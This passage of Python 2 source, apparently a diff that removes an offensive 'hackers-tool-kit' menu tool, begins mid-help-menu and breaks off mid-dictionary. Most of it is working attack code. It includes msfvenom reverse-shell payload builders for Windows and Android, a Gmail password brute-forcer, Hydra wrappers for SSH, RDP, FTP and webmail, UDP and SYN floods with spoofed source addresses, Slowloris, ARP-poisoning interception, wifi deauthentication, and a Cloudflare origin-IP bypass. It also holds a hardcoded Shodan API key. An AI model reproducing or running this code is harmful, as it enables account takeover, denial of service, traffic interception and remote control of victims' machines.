bruteforce -insta : instagram bruteforce -fb : facebook bruteforce -hydra : Black-Hydra bruteforce -medusa : Medusa bruteforce -ipgrab : host to ip address -myip : show your ip -wifite : automated wifi hacker -reaver : reaver automated [ wifi hack ] -mon : put device in monitor mode -monoff : put device out of monitor mode -netdev : find all devices in your network -scannet : scan for networks around you -specnet : scan a specific network -port : scan for ports on a host -info : info gather on a host [includes port scan]\033[91m █████████████████████ \033[0m -sysinfo : info about your system \033[91m ██ ██\033[0m -msfex : shows all metasploit exploits \033[91m ██ ██\033[0m -msfpa : shows all metasploit payloads \033[91m ██\033[90m ██ ██\033[91m ██\033[0m -msfau : shows all metasploit auxiliarys \033[91m ██\033[90m ██ ██\033[91m ██\033[0m -msfall : shows all metasploit modules \033[91m ██ ██\033[0m -udp : UDP flood / dos \033[91m ██ \033[90m █ \033[91m ██\033[0m -tcp : TCP flood / dos \033[91m ██\033[90m █ \033[91m ██\033[0m -syn : SYN flood / dos \033[91m █ █\033[0m -slowl : Slow Loris dos \033[91m █ █ \033[0m -ping : pings host \033[91m █ █\033[0m -multih : start a multi handler \033[91m █ █\033[0m -cupp : make wordlists \/ vvvvvvvvv \/ -vdir : view files of a directory -vpn : activate a vpn -vpnoff : stop vpn -pidox : dox website -pingen : Generate a routers default pin -deauth : deauth attack / wifi jammer -macc : changes mac address -macoff : returns mac address to normal -arppois : ARP poisoning -sslscan : ssl scan a host -payload : make a metasploit payload of your choice -crunch : Make wordlists -traff : shows your internet traffic -resa : reset account password -resu : reset unix password -hashid : find the type of hash of a hash -wafwoof : check a web application for firewall -cloud : cloudflare bypass -brutex : auto bruteforce every service of a host -methelp : show meterpreter help -winbyp : windows defender bypass -exploit : use a metasploit exploit of your choice -phish : phishing automated -datalist: list all hosts & services in the database -msfev : shows all metasploit evasions -upgrade : fully update your linux os -nscript : use a nmap script -\033[91m---------------------------------------------------------------------------------\033[0m - """ -def winload(): - gw = os.popen("ip -4 route show default").read().split() - s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) - s.connect((gw[2], 0)) - ipaddr = s.getsockname()[0] - gateway = gw[2] - host = socket.gethostname() - pf = raw_input("Port: ") - na = raw_input("Name of File: ") - ak = 'msfvenom -p windows/meterpreter/reverse_tcp LPORT={0} -f exe -o /root/{1}.exe LHOST={2}'.format(pf,na,ipaddr) - os.system(ak) -def andload(): - gw = os.popen("ip -4 route show default").read().split() - s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) - s.connect((gw[2], 0)) - ipaddr = s.getsockname()[0] - gateway = gw[2] - host = socket.gethostname() - pf = raw_input("Port: ") - na = raw_input("Name of File: ") - ak = 'msfvenom -p android/meterpreter/reverse_tcp LPORT={0} -o /root/{1}.apk LHOST={2}'.format(pf,na,ipaddr) - os.system(ak) -def gmail(): - #!/usr/bin/python - '''create by Ha3MrX''' - - import smtplib - from os import system - - def main(): - print '\033[93m=================================================' - print '\033[91m create by Ha3MrX ' - print '\033[93m=================================================' - print '\033[95m ++++++++++++++++++++ ' - print '\n ' - print '\033[92m _,. ' - print ' ' - print ' ' - print ' HA3MrX ' - print ' _,. ' - print ' ,` -.) ' - print ' ( _/-\\-._ ' - print ' /,|`--._,-^| , ' - print ' \_| |`-._/|| , | ' - print ' | `-, / | / / ' - print ' | || | / / ' - print ' `r-._||/ __ / / ' - print ' __,-<_ )`-/ `./ / ' - print ' \ `--- \ / / / ' - print ' | |./ / ' - print ' / // / ' - print ' \_/ \ |/ / ' - print ' | | _,^- / / ' - print ' | , `` (\/ /_ ' - print ' \,.->._ \X-=/^ ' - print ' ( / `-._//^` ' - print ' `Y-.____(__} ' - print ' | {__) ' - print ' () \033[91m V.1.0 ' - - main() - print '\033[0m[1] start the attack' - print '[2] exit' - option = input('==>') - if option == 1: - file_path = raw_input('path of passwords file :') - else: - system('clear') - exit() - pass_file = open(file_path,'r') - pass_list = pass_file.readlines() - def login(): - i = 0 - user_name = raw_input('target email :') - server = smtplib.SMTP_SSL('smtp.gmail.com', 465) - server.ehlo() - for password in pass_list: - i = i + 1 - print str(i) + '/' + str(len(pass_list)) - try: - server.login(user_name, password) - system('clear') - main() - print '\n' - print '[+] This Account Has Been Hacked Password :' + password + ' ^_^' - break - except smtplib.SMTPAuthenticationError as e: - error = str(e) - if error[14] == '<': - system('clear') - main() - print '[+] this account has been hacked, password :' + password + ' ^_^' - - break - else: - print '[!] password not found => ' + password - login() -def port(): - n = raw_input("Enter Target: ") - os.system("nmap " + n) -def insta(): - insta = raw_input("USERNAME> ") - jl = raw_input("WORDLIST> ") - k = raw_input("THREADS> ") - ma = 'python /root/hackers-tool-kit/tools/instagram.py {0} {1} {2}'.format(insta,jl,k) - os.system(ma) -def fb(): - facebook = raw_input("[EMAIL/ID->]: ") - word = raw_input("[WORDLIST->]: ") - ks = 'cd /root/hackers-tool-kit/tools && perl fb-brute.pl {0} {1}'.format(facebook,word) - os.system(ks) -def ipgrab(): - b = raw_input(Y+'Enter Host:\033[0m ') - ip = socket.gethostbyname(b) - print G+"------------------------\033[0m" - print N+"Host: ", b - print N+"IP: ", ip - print G+"------------------------\033[0m" -def myip(): - gw = os.popen("ip -4 route show default").read().split() - s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) - s.connect((gw[2], 0)) - ipaddr = s.getsockname()[0] - gateway = gw[2] - host = socket.gethostname() - print ("IP: ", ipaddr, " Gateway:", gateway, " Host:", host) -def wifite(): - os.system("wifite") -def mon(): - os.system("iwconfig") - i = raw_input("Select Interface: ") - os.system("airmon-ng start " + i) -def netdev(): - os.system("netdiscover") -def scannet(): - os.system("iwconfig") - m = raw_input("Select Interface: ") - print Y+"WOULD YOU LIKE TO SAVE YOUR SCAN RESULTS?\033[0m" - j = raw_input("[y/n]> ") - if j == "y": - os.system("airodump-ng -w /root/SCAN " + m) - print Y+"! SCAN RESULTS SAVED IN /root/ DIRECTORY !\033[0m" - if j == "n": - os.system("airodump-ng " + m) -def info(): - params = [] - # Browser - br = mechanize.Browser() - - # Just some colors and shit - white = '\033[1;97m' - green = '\033[1;32m' - red = '\033[1;31m' - yellow = '\033[1;33m' - end = '\033[1;m' - info = '\033[1;33m[!]\033[1;m' - que = '\033[1;34m[?]\033[1;m' - bad = '\033[1;31m[-]\033[1;m' - good = '\033[1;32m[+]\033[1;m' - run = '\033[1;97m[~]\033[1;m' - - # Cookie Jar - cj = cookielib.LWPCookieJar() - br.set_cookiejar(cj) - - # Browser options - br.set_handle_equiv(True) - br.set_handle_redirect(True) - br.set_handle_referer(True) - br.set_handle_robots(False) - - # Follows refresh 0 but not hangs on refresh > 0 - br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1) - br.addheaders = [ - ('User-agent', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1')] - - - print '''\033[1;31m - _________ __ __ __ - / _____// |________|__| | __ ___________ - \_____ \\\\ __\_ __ \ | |/ // __ \_ __ \\ - / \| | | | \/ | <\ ___/| | \/ - /_______ /|__| |__| |__|__|_ \\\\___ >__| - \/ \/ \/\033[1;m''' - target = raw_input('\033[1;34m[?]\033[1;m Enter the target: ') - if 'http' in target: - parsed_uri = urlparse(target) - domain = '{uri.netloc}'.format(uri=parsed_uri) - else: - domain = target - try: - br.open('http://' + target) - target = 'http://' + target - except: - target = 'https://' + target - - def sqli(url): - print '%s Using SQLMap api to check for SQL injection vulnerabilities. Don\'t worry we are using an online service and it doesn\'t depend on your internet connection. This scan will take 2-3 minutes.' % run - br.open('https://suip.biz/?act=sqlmap') - br.select_form(nr=0) - br.form['url'] = url - req = br.submit() - result = req.read() - match = search(r"---(?s).*---", result) - if match: - print '%s One or more parameters are vulnerable to SQL injection' % good - option = raw_input( - '%s Would you like to see the whole report? [Y/n] ' % que).lower() - if option == 'n': - pass - else: - print '\033[1;31m-\033[1;m' * 40 - print match.group().split('---')[1][:-3] - print '\033[1;31m-\033[1;m' * 40 - else: - print '%s None of parameters is vulnerable to SQL injection' % bad - - - def cms(domain): - try: - result = br.open('https://whatcms.org/?s=' + domain).read() - detect = search(r'class="nowrap" title="[^<]*">', result) - WordPress = False - try: - r = br.open(target + '/robots.txt').read() - if "wp-admin" in str(r): - WordPress = True - except: - pass - if detect: - print '%s CMS Detected : %s' % (info, detect.group().split('class="nowrap" title="')[1][:-2]) - detect = detect.group().split('">')[1][:-27] - if 'WordPress' in detect: - option = raw_input( - '%s Would you like to use WPScan? [Y/n] ' % que).lower() - if option == 'n': - pass - else: - os.system('wpscan --random-agent --url %s' % domain) - elif WordPress: - print '%s CMS Detected : WordPress' % info - option = raw_input( - '%s Would you like to use WPScan? [Y/n] ' % que).lower() - if option == 'n': - pass - else: - os.system('wpscan --random-agent --url %s' % domain) - else: - print '%s %s doesn\'t seem to use a CMS' % (info, domain) - except: - pass - - def honeypot(ip_addr): - result = {"0.0": 0, "0.1": 10, "0.2": 20, "0.3": 30, "0.4": 40, "0.5": 50, "0.6": 60, "0.7": 70, "0.8": 80, "0.9": 90, "1.0": 10} - honey = 'https://api.shodan.io/labs/honeyscore/%s?key=C23OXE0bVMrul2YeqcL7zxb6jZ4pj2by' % ip_addr - try: - phoney = br.open(honey).read() - if float(phoney) >= 0.0 and float(phoney) <= 0.4: - what = good - else: - what = bad - print '{} Honeypot Probabilty: {}%'.format(what, result[phoney]) - except KeyError: - print '\033[1;31m[-]\033[1;m Honeypot prediction failed' - - def whoisIt(url): - who = "" - print '{} Trying to gather whois information for {}'.format(run,url) - try: - who = str(whois.whois(url)).decode() - except Exception: - pass - test = who.lower() - if "whoisguard" in test or "protection" in test or "protected" in test: - print '{} Whois Protection Enabled{}'.format(bad, end) - else: - print '{} Whois information found{}'.format(good, end) - try: - data = json.loads(who) - for key in data.keys(): - print "{} :".format(key.replace("_", " ").title()), - if type(data[key]) == list: - print ", ".join(data[key]) - else: - print "{}".format(data[key]) - except ValueError: - print '{} Unable to build response, visit https://who.is/whois/{} {}'.format(bad, url, end) - pass - - def nmap(ip_addr): - port = 'http://api.hackertarget.com/nmap/?q=' + ip_addr - result = br.open(port).read() - result = sub(r'Starting[^<]*\)\.', '', result) - result = sub(r'Service[^<]*seconds', '', result) - result = os.linesep.join([s for s in result.splitlines() if s]) - print result - - def bypass(domain): - post = urlencode({'cfS': domain}) - result = br.open( - 'http://www.crimeflare.info/cgi-bin/cfsearch.cgi ', post).read() - - match = search(r' \b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\b', result) - if match: - bypass.ip_addr = match.group().split(' ')[1][:-1] - print '%s Real IP Address : %s' % (good, bypass.ip_addr) - - def dnsdump(domain): - res = DNSDumpsterAPI(False).search(domain) - print '\n%s DNS Records' % good - for entry in res['dns_records']['dns']: - print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) - for entry in res['dns_records']['mx']: - print '\n%s MX Records' % good - print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) - print '\n\033[1;32m[+]\033[1;m Host Records (A)' - for entry in res['dns_records']['host']: - if entry['reverse_dns']: - print '{domain} ({reverse_dns}) ({ip}) {as} {provider} {country}'.format(**entry) - else: - print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) - print '\n%s TXT Records' % good - for entry in res['dns_records']['txt']: - print entry - print '\n%s DNS Map: https://dnsdumpster.com/static/map/%s.png\n' % (good, domain.strip('www.')) - - - def fingerprint(ip_addr): - try: - result = br.open('https://www.censys.io/ipv4/%s/raw' % ip_addr).read() - match = search(r'"os_description": "[^<]*"', result) - if match: - print '%s Operating System : %s' % (good, match.group().split('n": "')[1][:-5]) - except: - pass - - - ip_addr = socket.gethostbyname(domain) - print '%s IP Address : %s' % (info, ip_addr) - try: - r = requests.get(target) - header = r.headers['Server'] - if 'cloudflare' in header: - print '%s Cloudflare detected' % bad - bypass(domain) - try: - ip_addr = bypass.ip_addr - except: - pass - else: - print '%s Server: %s' % (info, header) - try: - print '%s Powered By: %s' % (info, r.headers['X-Powered-By']) - except: - pass - try: - r.headers['X-Frame-Options'] - except: - print '%s Clickjacking protection is not in place.' % good - except: - pass - fingerprint(ip_addr) - cms(domain) - try: - honeypot(ip_addr) - except: - pass - print "{}----------------------------------------{}".format(red, end) - whoisIt(domain) - try: - r = br.open(target + '/robots.txt').read() - print '\033[1;31m-\033[1;m' * 40 - print '%s Robots.txt retrieved\n' % good, r - except: - pass - print '\033[1;31m-\033[1;m' * 40 - nmap(ip_addr) - print '\033[1;31m-\033[1;m' * 40 - dnsdump(domain) - os.system('cd plugins && python theHarvester.py -d %s -b all' % domain) - try: - br.open(target) - print '%s Crawling the target for fuzzable URLs' % run - for link in br.links(): - if 'http' in link.url or '=' not in link.url: - pass - else: - url = target + '/' + link.url - params.append(url) - if len(params) == 0: - print '%s No fuzzable URLs found' % bad - quit() - print '%s Found %i fuzzable URLs' % (good, len(params)) - for url in params: - print url - sqli(url) - url = url.replace('=', '') - r = br.open(url).read() - if '' in r: - print '%s One or more parameters are vulnerable to XSS' % good - break - print '%s These are the URLs having parameters:' % good - for url in params: - print url - except: - pass -def sysinfo(): - os.system("ifconfig") - os.system("iwconfig") - os.system("neofetch") - gw = os.popen("ip -4 route show default").read().split() - s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) - s.connect((gw[2], 0)) - ipaddr = s.getsockname()[0] - gateway = gw[2] - host = socket.gethostname() - print (" IP: ", ipaddr, " Gateway: ", gateway, " Host: ", host) -def msfex(): - os.system("service postgresql start") - os.system("""msfconsole -x 'show exploits'""") -def udp(): - target = raw_input(N+"Target:\033[91m ") - ip = socket.gethostbyname(target) - port = input(N+"Port:\033[91m ") - os.system("service tor restart") - print N+"udp attack started on {0}.{1} | {2}-{3}-{4}".format(hour, minute, day, month, year) - os.system("sleep 2s") - sent = 0 - print "KILLING %s CONNECTIONS"%(ip) - while True: - sock.sendto(Gb, (ip,port)) - sock.sendto(bytes, (ip,port)) - sock.sendto(Kb, (ip,port)) - sent = sent + 1 - port = port + 1 - print B+"|+| Slapping \033[0m|\033[31m %s \033[0m| Port |\033[31m %s \033[0m| Bytes |\033[31m %s \033[0m|"%(ip,port,sent) - if port == 65534: - port = 1 -def tcp(): - tcp = raw_input(Y+"[\033[92m+\033[91m-\033[0mTCP\033[91m-\033[92m+\033[93m]\033[0m ") - os.system("python " + tcp) -def syn(): - def randomIP(): - ip = ".".join(map(str, (random.randint(0,255)for _ in range(4)))) - return ip - - def randInt(): - x = random.randint(1000,9000) - return x - - def SYN_Flood(dstIP,dstPort,counter): - total = 0 - print "Packets are sending ..." - for x in range (0,counter): - s_port = randInt() - s_eq = randInt() - w_indow = randInt() - - IP_Packet = IP () - IP_Packet.src = randomIP() - IP_Packet.dst = dstIP - - TCP_Packet = TCP () - TCP_Packet.sport = s_port - TCP_Packet.dport = dstPort - TCP_Packet.flags = "S" - TCP_Packet.seq = s_eq - TCP_Packet.window = w_indow - - send(IP_Packet/TCP_Packet, verbose=0) - total+=1 - sys.stdout.write("\nTotal packets sent: %i\n" % total) - - - def info(): - - dstIP = raw_input ("\nTarget IP : ") - dstPort = input ("Target Port : ") - - return dstIP,int(dstPort) - - - def main(): - dstIP,dstPort = info() - counter = input ("Packets : ") - SYN_Flood(dstIP,dstPort,int(counter)) - - main() - -def ping(): - p = raw_input("Enter Host: ") - os.system("ping " + p) -def msfpa(): - os.system("service postgresql start") - os.system("""msfconsole -x 'show payloads'""") -def msfau(): - os.system("service postgresql start") - os.system("""msfconsole -x 'show auxiliary'""") -def multih(): - os.system("service postgresql start") - os.system("""msfconsole -x 'use multi/handler'""") -def msfall(): - os.system("service postgresql start") - os.sytem("""msfconsole -x 'show all'""") -def hydra(): - """ - This program is just a small program to shorten brute force sessions on hydra :) - But to be more satisfying results of the brute force. You better interact directly with hydra, - without having to use this black hydra console first: '). - If you find any errors in running our program. Can chat via facebook :). - Hydra is needed for the process of this program :). - """ - import sys, os, time - - # Restart #################### - def restart_program(): - python = sys.executable - os.execl(python, python, * sys.argv) - curdir = os.getcwd() - ############################## - - os.system("clear") - print B+"___ _ ____ ____ _ _ _ _ _ _ ___ ____ ____" - print "|__] | |__| | |_/ |__| \_/ | \ |__/ |__|" - print "|__] |___ | | |___ | \_ | | | |__/ | \ | |" - print G+"-----------------------------------------------------" - print N+"[]xxxxx[]::::::::::::::::::::> 24-07-2017 (7:53)" - print R+" [*] Author: DedSecTL --- [*] Version 1.0" - print N+"c=={:::::::::::::::> Black Hydra Console" - print R+" [*] My FB : https://m.facebook.com/100004136748473" - print N+"(}xxx{):::::::::> AndroSec1337 Cyber Team" - print - print " ===|[ Brute Force ]|===" - print - print " [01] Cisco Brute Force " - print " [02] VNC Brute Force " - print " [03] FTP Brute Force " - print " [04] Gmail Brute Force " - print " [05] SSH Brute Force " - print " [06] TeamSpeak Brute Force " - print " [07] Telnet Brute Force " - print " [08] Yahoo Mail Brute Force " - print " [09] Hotmail Brute Force " - print " [10] Router Speedy Brute Force " - print " [11] RDP Brute Force " - print " [12] MySQL Brute Force " - print - print " [00] Exit" - print - bhydra = raw_input("[*] B-Hydra > ") - - if bhydra == '01' or bhydra == '1': - print - print " +---------------------------+" - print " | Cisco Brute Force |" - print " +---------------------------+" - print - print - iphost = raw_input("[*] IP/Hostname : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -P %s %s cisco" % (word, iphost)) - sys.exit() - - elif bhydra == '02' or bhydra == '2': - print - print " +---------------------------+" - print " | VNC Brute Force |" - print " +---------------------------+" - print - print - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -P %s -e n -t 1 %s vnc -V" % (word, iphost)) - iphost = raw_input("[*] IP/Hostname : ") - - elif bhydra == '03' or bhydra == '3': - print - print " +------------------------------+" - print " | FTP Brute Force |" - print " +------------------------------+" - print - print - user = raw_input("[*] User : ") - iphost = raw_input("[*] IP/Hostname : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -l %s -P %s %s ftp" % (user, word, iphost)) - sys.exit() - - elif bhydra == '04' or bhydra == '4': - print - print " +------------------------------+" - print " | Gmail Brute Force |" - print " +------------------------------+" - print - print - email = raw_input("[*] Email : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -l %s -P %s -s 465 smtp.gmail.com smtp" % (email, word)) - sys.exit() - - elif bhydra == '05' or bhydra == '5': - print - print " +--------------------------------+" - print " | SSH Brute Force |" - print " +--------------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -l %s -P %s %s ssh" % (user, word, iphost)) - sys.exit() - - elif bhydra == '06' or bhydra == '6': - print - print " +-------------------------+" - print " | TeamSpeak Brute Force |" - print " +-------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -l %s -P %s -s 8676 %s teamspeak" % (user, word, iphost)) - sys.exit() - - elif bhydra == '07' or bhydra == '7': - print - print " +-------------------------+" - print " | Telnet Brute Force |" - print " +-------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -l %s -P %s %s telnet" % (user, word, iphost)) - sys.exit() - - elif bhydra == '08' or bhydra == '8': - print - print " +---------------------------+" - print " | Yahoo Brute Force |" - print " +---------------------------+" - print - print - email = raw_input("[*] Email : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -l %s -P %s -s 587 smtp.mail.yahoo.com smtp" % (email, word)) - sys.exit() - - elif bhydra == '09' or bhydra == '9': - print - print " +----------------------------+" - print " | Hotmail Brute Force |" - print " +----------------------------+" - print - print - email = raw_input("[*] Email : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -l %s -P %s -s 587 smtp.live.com smtp" % (email, word)) - sys.exit() - - elif bhydra == '10': - print - print " +-----------------------------+" - print " | Router Speedy Brute Force |" - print " +-----------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -m / -l %s -P %s %s http-get" % (user, word, iphost)) - sys.exit() - - elif bhydra == '11': - print - print " +----------------------------+" - print " | RDP Brute Force |" - print " +----------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -t 1 -V -f -l %s -P %s %s rdp" % (user, word, iphost)) - sys.exit() - - elif bhydra == '12': - print - print " +-----------------------------+" - print " | MySQL Brute Force |" - print " +-----------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -t 5 -V -f -l %s -e ns -P %s localhost mysql" % (user, word)) - - elif bhydra == '00' or bhydra == '0': - print "\n[!] Exit the Program..." - sys.exit() - - else: - print "\n[!] ERROR : Wrong Input" - time.sleep(1) - restart_program() -def cupp(): - os.system("cd /root/hackers-tool-kit/wordlists && cupp -i") - print Y+"wordlist saved to /root/hackers-tool-kit/wordlists\033[0m" -def vdir(): - print "\n" - os.system("ls") - print Y+"! doesnt have to be these can be any directory !\033[0m" - print "\n" - h = raw_input("Directory Path: ") - print "\n" - print "--------------------------------------------------------------------------------------------------------------------------------------------" - os.system("ls " + h) - print "--------------------------------------------------------------------------------------------------------------------------------------------" - -def monoff(): - os.system("iwconfig") - i = raw_input("Select Interface: ") - os.system("airmon-ng stop " + i) -def vpn(): - os.system("anonsurf start") - os.system("anonsurf myip") -def vpnoff(): - os.system("anonsurf stop") - os.system("anonsurf myip") -def slowl(): - de = raw_input("Delay: ") - tar = raw_input("RHOST: ") - port = raw_input("RPORT: ") - soc = raw_input("Sockets: ") - os.system('echo "use auxiliary/dos/http/slowloris\n" > handler.rc') - os.system('echo "set delay {0}\n" >> handler.rc'.format(de)) - os.system('echo "set RHOST {0}\n" >> handler.rc'.format(tar)) - os.system('echo "set RPORT {0}\n" >> handler.rc'.format(port)) - os.system('echo "set sockets {0}\n" >> handler.rc'.format(soc)) - os.system('echo "run\n" >> handler.rc') - os.system('msfconsole -r handler.rc') - os.system('rm -rf handler.rc') - -def pidox(): - print Y+"! USING FIREFOX !\033[0m" - os.system("sleep 2") - os.system("firefox https://pipl.com/") -def specnet(): - jk = raw_input("BSSID: ") - kj = raw_input("ESSID: ") - os.system("iwconfig") - k = raw_input("INTERFACE: ") - print Y+"WOULD YOU LIKE TO SAVE YOUR SCAN RESULTS?\033[0m" - j = raw_input("[y/n]> ") - if j == "y": - a = 'airodump-ng -w /root/SCAN --bssid {0} --essid {1} {2}'.format(jk,kj,k) - os.system(a) - if j == "n": - a = 'airodump-ng --bssid {0} --essid {1} {2}'.format(jk,kj,k) - os.system(a) -def pingen(): - j = raw_input("Enter BSSID: ") - a = 'cd /root/hackers-tool-kit/tools && python pingen.py {0}'.format(j) - os.system(a) -def reaver(): - os.system("iwconfig") - j = raw_input("Select Interface: ") - k = raw_input("Enter BSSID: ") - a = 'reaver -i {0} -b {1} -vv'.format(j,k) - os.system(a) -def deauth(): - print Y+"! YOU MAY HAVE TO CHANGE YOUR WIFI CHANNEL !\033[0m" - j = raw_input("Enter BSSID> ") - os.system("iwconfig") - k = raw_input("Enter Interface> ") - a = 'aireplay-ng -0 0 -a {0} {1}'.format(j,k) - os.system(a) -def macc(): - os.system("iwconfig") - k = raw_input("Interface: ") - c = 'ifconfig {0} down'.format(k) - os.system(c) - os.system("macchanger -r " + k) - s = 'ifconfig {0} up'.format(k) - os.system(s) -def macoff(): - os.system("iwconfig") - k = raw_input("Interface: ") - c = 'ifconfig {0} down'.format(k) - os.system(c) - os.system("macchanger -p " + k) - s = 'ifconfig {0} up'.format(k) - os.system(s) -def arppois(): - - try: - os.system("iwconfig") - interface = raw_input("[*] Enter Interface: ") - victimIP = raw_input("[*] Enter Victim IP: ") - gateIP = raw_input("[*] Enter Router IP: ") - except KeyboardInterrupt: - print "\n[*] User Requested Shutdown" - print "[*] Exiting..." - os.system("clear") - mainbanner() - - print "\n[*] Enabling IP Forwarding...\n" - os.system("echo 1 > /proc/sys/net/ipv4/ip_forward") - - def get_mac(IP): - conf.verb = 0 - ans, unans = srp(Ether(dst = "ff:ff:ff:ff:ff:ff")/ARP(pdst = IP), timeout = 2, iface = interface, inter = 0.1) - for snd,rcv in ans: - return rcv.sprintf(r"%Ether.src%") - - def reARP(): - - print "\n[*] Restoring Targets..." - victimMAC = get_mac(victimIP) - gateMAC = get_mac(gateIP) - send(ARP(op = 2, pdst = gateIP, psrc = victimIP, hwdst = "ff:ff:ff:ff:ff:ff", hwsrc = victimMAC), count = 7) - send(ARP(op = 2, pdst = victimIP, psrc = gateIP, hwdst = "ff:ff:ff:ff:ff:ff", hwsrc = gateMAC), count = 7) - print "[*] Disabling IP Forwarding..." - os.system("echo 0 > /proc/sys/net/ipv4/ip_forward") - print "[*] Shutting Down..." - os.system("clear") - mainbanner() - - def trick(gm, vm): - send(ARP(op = 2, pdst = victimIP, psrc = gateIP, hwdst= vm)) - send(ARP(op = 2, pdst = gateIP, psrc = victimIP, hwdst= gm)) - - def mitm(): - try: - victimMAC = get_mac(victimIP) - except Exception: - os.system("echo 0 > /proc/sys/net/ipv4/ip_forward") - print "[!] Couldn't Find Victim MAC Address" - print "[!] Exiting..." - os.system("clear") - mainbanner() - try: - gateMAC = get_mac(gateIP) - except Exception: - os.system("echo 0 > /proc/sys/net/ipv4/ip_forward") - print "[!] Couldn't Find Gateway MAC Address" - print "[!] Exiting..." - os.system("clear") - mainbanner() - print "[*] Poisoning Targets..." - while 1: - try: - trick(gateMAC, victimMAC) - time.sleep(1.5) - except KeyboardInterrupt: - reARP() - break - mitm() -def sslscan(): - j = raw_input('Enter Target: ') - a = 'sslscan {0}'.format(j) - os.system(a) -def payload(): - os.system("cat /root/hackers-tool-kit/tools/payloads.txt") - print "\n" - f = raw_input("Select Payload: ") - l = raw_input("LHOST: ") - c = raw_input("LPORT: ") - os.system("cat /root/hackers-tool-kit/tools/formats.txt") - s = raw_input("Format: ") - h = raw_input("File Name: ") - a = 'msfvenom -p {0} LHOST={1} LPORT={2} -f {3} -o /root/{4}.{5}'.format(f,l,c,s,h,s) - os.system(a) -def crunch(): - print "minimal number of characters" - j = raw_input("[CRUNCH]: ") - print "maximum number of characters" - k = raw_input("[CRUNCH]: ") - print "what characters should be in it" - b = raw_input("[CRUNCH]: ") - print "name of file" - s = raw_input("[CRUNCH]: ") - a = 'crunch {0} {1} {2} -o /root/hackers-tool-kit/wordlists/{3}'.format(j,k,b,s) - os.system(a) - print Y+"wordlist saved to \033[0m/root/hackers-tool-kit/wordlists/" + s -def traff(): - os.system("iwconfig") - s = raw_input("Select Interface: ") - os.system("tcpdump -i " + s) -def resa(): - j = raw_input("USERNAME: ") - k = raw_input("NEW PASSWORD: ") - print "are you sure?" - q = raw_input("[y/n]: ") - if q == "n": - os.system("clear") - mainbanner() - if q == "y": - a = 'echo "{0}:{1}" | chpasswd'.format(j,k) - print "password for {0} has been reset".format(j) -def resu(): - j = raw_input("PASSWORD: ") - print "are you sure?" - q = raw_input("[y/n]: ") - if q == "n": - os.system("clear") - mainbanner() - if q == "y": - a = 'passwd {0}'.format(j) - print "unix password has been reset".format(j) -def hashid(): - #!/usr/bin/python - # encoding: utf-8 - # Hash Identifier v1.1 - # By Zion3R - # www.Blackploit.com - # Root@Blackploit.com - - logo=''' ######################################################################### - # __ __ __ ______ _____ # - # /\ \/\ \ /\ \ /\__ _\ /\ _ `\ # - # \ \ \_\ \ __ ____ \ \ \___ \/_/\ \/ \ \ \/\ \ # - # \ \ _ \ /'__`\ / ,__\ \ \ _ `\ \ \ \ \ \ \ \ \ # - # \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \ \_\ \__ \ \ \_\ \ # - # \ \_\ \_\ \___ \_\/\____/ \ \_\ \_\ /\_____\ \ \____/ # - # \/_/\/_/\/__/\/_/\/___/ \/_/\/_/ \/_____/ \/___/ v1.1 # - # By Zion3R # - # www.Blackploit.com # - # Root@Blackploit.com # - #########################################################################''' - - algorithms={"102020":"ADLER-32", "102040":"CRC-32", "102060":"CRC-32B", "101020":"CRC-16", "101040":"CRC-16-CCITT", "104020":"DES(Unix)", "101060":"FCS-16", "103040":"GHash-32-3", "103020":"GHash-32-5", "115060":"GOST R 34.11-94", "109100":"Haval-160", "109200":"Haval-160(HMAC)", "110040":"Haval-192", "110080":"Haval-192(HMAC)", "114040":"Haval-224", "114080":"Haval-224(HMAC)", "115040":"Haval-256", "115140":"Haval-256(HMAC)", "107080":"Lineage II C4", "106025":"Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))", "102080":"XOR-32", "105060":"MD5(Half)", "105040":"MD5(Middle)", "105020":"MySQL", "107040":"MD5(phpBB3)", "107060":"MD5(Unix)", "107020":"MD5(Wordpress)", "108020":"MD5(APR)", "106160":"Haval-128", "106165":"Haval-128(HMAC)", "106060":"MD2", "106120":"MD2(HMAC)", "106040":"MD4", "106100":"MD4(HMAC)", "106020":"MD5", "106080":"MD5(HMAC)", "106140":"MD5(HMAC(Wordpress))", "106029":"NTLM", "106027":"RAdmin v2.x", "106180":"RipeMD-128", "106185":"RipeMD-128(HMAC)", "106200":"SNEFRU-128", "106205":"SNEFRU-128(HMAC)", "106220":"Tiger-128", "106225":"Tiger-128(HMAC)", "106240":"md5($pass.$salt)", "106260":"md5($salt.'-'.md5($pass))", "106280":"md5($salt.$pass)", "106300":"md5($salt.$pass.$salt)", "106320":"md5($salt.$pass.$username)", "106340":"md5($salt.md5($pass))", "106360":"md5($salt.md5($pass).$salt)", 